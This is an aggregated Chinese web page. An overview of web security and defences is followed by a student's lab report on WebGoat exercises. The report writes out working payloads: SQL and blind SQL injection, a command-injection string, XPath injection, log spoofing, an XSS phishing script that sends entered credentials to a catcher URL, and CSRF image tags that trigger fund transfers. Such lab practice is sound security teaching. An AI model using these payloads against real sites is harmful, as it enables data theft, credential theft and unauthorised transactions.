什么是 Web安全?Web应用漏洞的防御实现
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了什么是 Web安全?Web应用漏洞的防御实现相关的知识,希望对你有一定的参考价值。
参考技术A什么是 Web安全?
Web安全是计算机术语。随着Web2.0、社交网络等一系列新型的互联网产品诞生问世,基于Web环境的互联网应用越来越广泛,企业信息化的过程中各种应用都架设在Web平台上,Web业务的迅速发展也引起黑客们的窥探,接踵而至的就是Web安全威胁的凸显。
黑客利用网站操作系统的漏洞和Web服务程序的SQL注入漏洞等得到Web服务器的控制权限,轻则篡改网页内容,重则窃取重要内部数据,更为严重的则是在网页中植入恶意代码,使得网站访问者受到侵害。
Web安全的现状及原因
目前,很多业务都依赖于互联网,无论是网上银行、网上购物、还是网络 游戏 等,恶意攻击者们出于各种不良目的,对Web 服务器进行攻击,想方设法通过各种手段获取他人的个人账户信息谋取利益。正是如此,Web业务平台最容易遭受攻击。
而针对Web服务器的攻击也是五花八门,常见的有挂马、SQL注入、缓冲区溢出、嗅探、利用IIS等针对Webserver漏洞进行攻击。
一方面,由于TCP/IP的设计是没有考虑安全问题的,网络上传输的数据是没有任何安全防护。攻击者们可利用系统漏洞造成系统进程缓冲区溢出,攻击者可能获得或者提升自己在有漏洞的系统上的用户权限来运行任意程序,甚至安装和运行恶意代码,窃取机密数据。
而应用层面的软件在开发过程中也没有过多考虑到安全的问题,这使得程序本身存在很多漏洞,诸如缓冲区溢出、SQL注入等等流行的应用层攻击,这些都属于在软件研发过程中疏忽了对安全的考虑所致。
另一方面,个人用户由于好奇心,被攻击者利用木马或病毒程序进行攻击,攻击者将木马或病毒程序捆绑在一些诱人的图片、音视频或免费软件等文件中,然后将这些文件置于某些网站当中,再引诱用户去单击或下载运行,或通过电子邮件附件和QQ、MSN等即时聊天软件,将这些捆绑了木马或病毒的文件发送给用户,让用户打开或运行这些文件。
Web安全的三个细分
Web安全主要分为:1、保护服务器及其数据的安全。2、保护服务器和用户之间传递的信息的安全。3、保护Web应用客户端及其环境安全这三个方面。
Web应用防火墙
Web应用安全问题本质上源于软件质量问题。但Web应用相较传统的软件,具有其独特性。Web应用往往是某个机构所独有的应用,对其存在的漏洞,已知的通用漏洞签名缺乏有效性;
需要频繁地变更以满足业务目标,从而使得很难维持有序的开发周期;需要全面考虑客户端与服务端的复杂交互场景,而往往很多开发者没有很好地理解业务流程;人们通常认为Web开发比较简单,缺乏经验的开发者也可以胜任。
Web应用安全,理想情况下应该在软件开发生命周期遵循安全编码原则,并在各阶段采取相应的安全措施。
然而,多数网站的实际情况是:大量早期开发的Web应用,由于 历史 原因,都存在不同程度的安全问题。对于这些已上线、正提供生产的Web应用,由于其定制化特点决定了没有通用补丁可用,而整改代码因代价过大变得较难施行或者需要较长的整改周期。
这种现状,专业的Web安全防护工具是一种合理的选择。WEB应用防火墙(以下简称WAF)正是这类专业工具,提供了一种安全运维控制手段:基于对HTTP/HTTPS流量的双向分析,为Web应用提供实时的防护。
Web应用漏洞的防御实现
对于常见的Web应用漏洞,应该从3个方面入手进行防御:
1、对 Web应用开发者而言
大部分Web应用常见漏洞都是在Web应用开发中,由于开发者没有对用户输入的参数进行检测或者检测不严格造成的。所以,Web应用开发者应该树立很强的安全意识,开发中编写安全代码;
对用户提交的URL、查询关键字、HTTP头、POST数据等进行严格的检测和限制,只接受一定长度范围内、采用适当格式及编码的字符,阻塞、过滤或者忽略其它的任何字符。通过编写安全的Web应用代码,可以消除绝大部分的Web应用安全问题。
2、对Web网站管理员而言
作为负责网站日常维护管理工作Web管理员,应该及时跟踪并安装最新的、支撑Web网站运行的各种软件的安全补丁,确保攻击者无法通过软件漏洞对网站进行攻击。
除了软件本身的漏洞外,Web服务器、数据库等不正确的配置也可能导致Web应用安全问题。Web网站管理员应该对网站各种软件配置进行仔细检测,降低安全问题的出现可能。
此外,Web管理员还应该定期审计Web服务器日志,检测是否存在异常访问,及早发现潜在的安全问题。
3、使用网络防攻击设备
前两种都是预防方式,相对来说很理想化。在现实中,Web应用系统的漏洞仍旧不可避免:部分Web网站已经存在大量的安全漏洞,而Web开发者和网站管理员并没有意识到或发现这些安全漏洞。
由于Web应用是采用HTTP协议,普通的防火墙设备无法对Web类攻击进行防御,因此需要使用入侵防御设备来实现安全防护。
20154321 Exp9: Web安全基础实践
20154321【网络对抗技术】Exp9: Web安全基础实践
Exp 8 Web基础
一、基础问题
- SQL注入攻击原理,如何防御
- SQL注入漏洞是指在Web应用对后台数据库查询语句处理存在的安全漏洞。也就是,在输入字符串中嵌入SQL指令,在设计程序中忽略对可能构成攻击的特殊字符串的检查。后台数据库将其认作正常SQL指令后正常执行,可能实现对后台数据库进行各种操作,甚至造成破坏后台数据库等严重后果。
- SQL注入一般分为普通注入和盲注。
- 普通注入:后台数据库会回显有价值的提示信息,通过这些可能的报错信息可以更容易地进行注入,适合新手入门训练。
- 盲注:后台管理员在给出错误页面时,没有提供详细错误信息。攻击者需要运用脚本通过仅有的判断信息(比如时间差)对表中的每一个字段进行探测,从而实现注入。
- 防御:对输入的数据进行过滤,过滤掉敏感字符。加密数据库。
- XSS攻击的原理,如何防御
- 攻击者利用网站漏洞(通常这些漏洞是指网站后台处理程序没有很好的对用户输入进行过滤),输入可以显示在页面上的、对其他用户造成影响的HTML代码;由于受害者浏览器对目标服务器的信任,当其访问目标服务器上被注入恶意脚本的页面后,这段恶意脚本可以顺利执行,实现获取用户cookie并可以利用用户身份进行非法操作的目的。
- 浏览器自身可以识别简单的XSS攻击字符串,从而阻止简单的XSS攻击;从根本上说,解决办法是消除网站的XSS漏洞,这就需要网站开发者运用转义安全字符等手段。
- CSRF攻击原理,如何防御
- CSRF攻击的主要目的是让用户在不知情的情况下攻击自己已登录的一个系统,类似于钓鱼。如用户当前已经登录了邮箱,或bbs,同时用户又在使用另外一个,已经被你控制的站点,我们姑且叫它钓鱼网站。这个网站上面可能因为某个图片吸引你,你去点击一下,此时可能就会触发一个js的点击事件,构造一个bbs发帖的请求,去往你的bbs发帖,由于当前你的浏览器状态已经是登陆状态,所以session登陆cookie信息都会跟正常的请求一样,纯天然的利用当前的登陆状态,让用户在不知情的情况下,帮你发帖或干其他事情
- 通过 referer、token 或者 验证码 来检测用户提交。尽量不要在页面的链接中暴露用户隐私信息。对于用户修改删除等操作最好都使用post 操作
二、实践过程
1.开启webgoat
在终端中输入java -jar webgoat-container-7.1-exec.jar开启
WebGoat
。
打开浏览器,在地址栏输入 localhost:8080/WebGoat
打开 WebGoat
,选择默认账号、密码即可登陆成功。
1.SQL字符串注入(String SQL Injection)
SQL注入攻击,入手点在web 但是从根本上来说是SQL的问题。尝试注入一个SQL字符串,以显示所有信用卡号码。 尝试使用\'Smith\'的用户名。
输入\'or 1=\'1
,语句就变成SELECT * FROM user_data WHERE last_name = \'\'or 1=\'1\'
,
这句的意思就是查询lastname= \'\' (或者)1=\'1\' ,这里的 1=\'1\' 永远为真,所以不管姓啥都是对的,都能被显示出来,这是最简单的SQL注入攻击。主要防御方式是字符串过滤。
如下图所示:
2、日志欺骗(Log Spoofing)
日志欺骗主要就是利用日志的格式,使用换行等字符,欺骗管理员。
比如输入huangrui%0d%0aLogin Succeeded for username: admin,
密码随意
url参数带有%0d%0a , 在servlet里得到包含这个字段的string时, %0d%0a 就会被转义为回车。
3、数字型SQL注入(Numeric SQL Injection)
题目就是要求这个表单允许使用者看到天气数据,利用SQL注入使得可以看见所有数据
在网页右键选中inspect Element
对源代码进行修改,找到任意一个值比如101旁边加上 or 1=1;
然后点击 :go, 成功。
4、命令注入(Command Injection)
题目大概就是要尝试给操作系统注入命令行,要求能够在目标主机上执行系统命令
我们还是右击选中inspect Element进行代码修改。
例如在BackDoors.help旁边加上"& netstat -an & ipconfig"。
点击view.
5.XPATH Injection
题目大概意思就是使用帐户Mik/Test123,试着去查看其他员工的数据。
使用一个普通的用户名和密码,XPath会起作用,但是攻击者可能会发送一个坏用户名和密码,并在不知道用户名或密码的情况下,选择一个XML节点,我们也创造一个类似的永真式:
Username: huangrui\' or 1=1 or \'a\'=\'a
passwoad:huangrui
6、数字盲注(Blind Numeric SQL Injection)
题目中说明了下面的表单允许用户输入帐号并确定它是否有效,即返回值只有账户有效或无效两种。
先输入101 AND ((SELECT pin FROM pins WHERE cc_number=\'1111222233334444\') > 10000);
,结果是
Invalid account number.无效。所以我们还要缩小范围。
这个时候又显示Account number is valid,也说明确实存在这个账户。
最后经过多次尝试,找到2364
7、盲字符串注入(Blind String SQL Injection)
和上一个差不多,只是由猜数字变成猜字符,方法都差不多。
使用语句 101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number=\'4321432143214321\'), 1, 1) < \'K\' ) 查询第一个字符。
然后又试了H,它显示无效,所以就可以确定是H到K之间。
然后再使用语句 101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number=\'4321432143214321\'), 2, 1) < \'r\' ) 查询第二个字符。
以此类推。最后查询出来为Jill.
Cross-Site Scripting (XSS)
8、跨站脚本钓鱼攻击(Phishing with XSS)
这道题是关于一个页面中存在XSS漏洞时,他如何支持钓鱼攻击。要求我们利用xss和html注入达到这些目标。
使用XSS和HTML插入制作一个钓鱼网站,将下面的代码输在search框中:
</form>
<script>
function hack(){
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
}
</script>
<form name="phish">
<br><br>
<HR>
<H2>This feature requires account login:</H2>
<br>
<br>Enter Username:<br> <input type="text" name="user">
<br>Enter Password:<br> <input type="password" name = "pass">
<br> <input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>
然后下拉网页,会有用户名和密码的框出现,随意输入用户名和密码
9、存储型xss(Stored XSS Attacks)
这道题是我们要在信息中添加一个html的标签。
那就在信息框里写一句<script>alert("you are so beautiful~");</script>
,然后点击提交之后,留言板上会出现这条信息的标题,标题随意。
点击标题
10.
CSRF
Cross Site Request Forgery(CSRF)
要求:需要写一个URL诱使其他用户点击,从而触发CSRF攻击.
我们可以以图片的的形式将URL放进Message框,这时的URL对其他用户是不可见的,用户一旦点击图片,就会触发一个CSRF事件。
1.查看自己电脑的Screen和menu的值
2.在信息框内输入<img src="http://localhost:8080/WebGoat/attack?Screen=2078372&menu=900&transferFunds=1000000"/>
(这句话的意思是将Funds即金钱转到自己的账户里),点击提交之后可以看到信息
3.点进去后,盗取钱财。攻击成功
11.
CSRF Prompt By-Pass
和上一个类似,发个邮件给newsgrooup,包含两个恶意请求:一个是转钱的金额,另一个是确认转账。
1.首先还是查看电脑的Screen和menu的值
2.在信息框输入
<img src="attack?Screen=1471017872&menu=900&transferFunds=5000"
width="1" height="1">
<img src="attack?Screen=1471017872&menu=900&transferFunds=confirm"
width="1" height="1">
点击提交后可看到
3.点进去,发现攻击成功
三.实验心得:
最后一次实验了,想着考完试后的周五检查所以也没着急,圆满完成。这课确实也学到了很多实在的东西,老师幸苦了,welldown!
以上是关于什么是 Web安全?Web应用漏洞的防御实现的主要内容,如果未能解决你的问题,请参考以下文章